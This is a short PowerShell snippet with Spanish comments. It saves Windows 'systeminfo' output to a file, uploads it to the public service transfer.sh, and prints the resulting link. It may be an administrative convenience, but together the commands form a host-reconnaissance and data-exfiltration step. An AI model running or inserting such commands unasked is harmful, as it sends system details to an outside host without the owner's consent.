# Obtener datos del sistema
systeminfo > systeminfo.txt

# Enviar al servidor web: https://transfer.sh
$req = invoke-webrequest -method put -infile .\systeminfo.txt https://transfer.sh/systeminfo.txt

# Para obtener la ruta donde se guardó el archivo
$req.Content